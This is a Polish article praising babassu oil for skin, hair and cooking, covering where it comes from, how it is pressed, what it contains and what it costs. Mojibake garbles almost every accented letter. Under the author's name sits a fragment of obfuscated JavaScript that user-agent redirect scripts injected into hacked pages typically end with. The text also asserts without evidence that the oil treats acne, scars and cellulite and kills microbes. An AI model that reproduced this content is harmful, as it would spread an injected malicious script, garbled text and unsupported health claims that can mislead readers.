Cudowne wA�aA�ciwoA�ci oleju babassu

0
23
https://pixabay.com

JeA�li szukasz skutecznego kosmetyku i zarazemA�naturalnego, koniecznieA�siA�gnijA�A�po olej babassu. Jego skA�ad dziaA�a zbawiennie na naszA� skA?rA� i wA�osy. Do tegoA�piA�knieA�pachnieA�i A�atwo siA� rozprowadza. SzczegA?lnie polecany jest doA�pielA�gnacjiA�skA?ryA�wraA?liwej i odwodnionej.A�

Coraz czA�A�ciej olej babassu jest wykorzystywany przez firmy kosmetyczne ze wzglA�du na swoje wA�aA�ciwoA�ci. Pozyskiwany jest z palmy znanej jako atalia brazylijska zwana babassu, uprawianej w wilgotnych lasach Brazylii i w Afryce.

Olej otrzymywany jest z dojrzaA�ych orzechA?w. Na poczA�tku sA� one zbierane, rozA�upywane mA�oteczkiem, a nastA�pnie wydobywa siA� ze A�rodka nasiona, z ktA?rych, A�podczas tA�oczenia na zimno, jest pozyskiwany olej. Jest on oczyszczany tradycyjnymi metodami bez uA?ycia rozpuszczalnikA?w organicznych, dziA�ki czemu jest uznany za bezpieczny do stosowania w kosmetyce naturalnej.

MoA?na go dostaA� w wielu sklepach internetowych z naturalnymi i ekologicznymi produktami. Bywa teA? stosowany w kremach nawilA?ajA�cych, balsamach, mleczkach, masA�ach, emulsjach do masaA?u czy w pomadkach i tuszach do rzA�s. MoA?na go znaleA?A� rA?wnieA? A�w ekologicznych mydA�ach, szamponach i A?elach do mycia.

Babassu wystA�pujA� w formie miA�kkiego masA�a, natomiast w kontakcie ze skA?rA� zaczyna siA� topiA� co uA�atwia aplikacjA�. Olej szybko siA� wchA�ania i dziaA�a natychmiastowo, nie zostawiajA�c tA�ustych plam. JeA?eli chcemy uzyskaA� pA�ynnA� formA� wystarczy go podgrzaA� – topi siA� w temperaturze od 20 do 30 stopni Celsjusza.

Olej babassu zawiera wiele cennych skA�adnikA?w takich jak kwasy oleinowy, linolowy, linolenowy, laurynowy i mirystynowy, a takA?e witaminA� E, znanA� rA?wnieA? jako eliksir mA�odoA�ci, oraz fitosterole, czyli sterole roA�linne.

Jego stosowanie zmiA�kcza, nawilA?a, ujA�drnia oraz dziaA�a A�przeciwzmarszczkowo. MoA?na go uA?ywaA� rA?wnieA? na trA�dzik, przebarwienia, blizny, cellulit czy rozstA�py. DziaA�a antybakteryjnie, niszczy drobnoustroje, A�agodzi podraA?nienia oraz wzmacnia naskA?rek. MoA?na stosowaA� go jako maseczkA� na wA�osy, jeA�li sA� suche, matowe, pozbawione A?ycia i sprA�A?ystoA�ci. Maseczka uA�atwi rA?wnieA? rozczesywanie oraz pomoA?e na rozdwojone koA�cA?wki. ZaletA� rA?wnieA? jest cena poniewaA? za 100 g produktu zapA�acimy ok 25 zA�.

MoA?emy go rA?wnieA? stosowaA� w kuchni jako zamiennik oleju kokosowego czy palmowego. UA?ywany jest najczA�A�ciej do daA� z ryb, miA�s oraz po podgrzaniu do saA�atek i zup.A�NaleA?y go przechowywaA� w ciemnych, chA�odnych miejscach.

Justyna Wydra 446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

BRAK KOMENTARZY

ZOSTAW ODPOWIEDŹ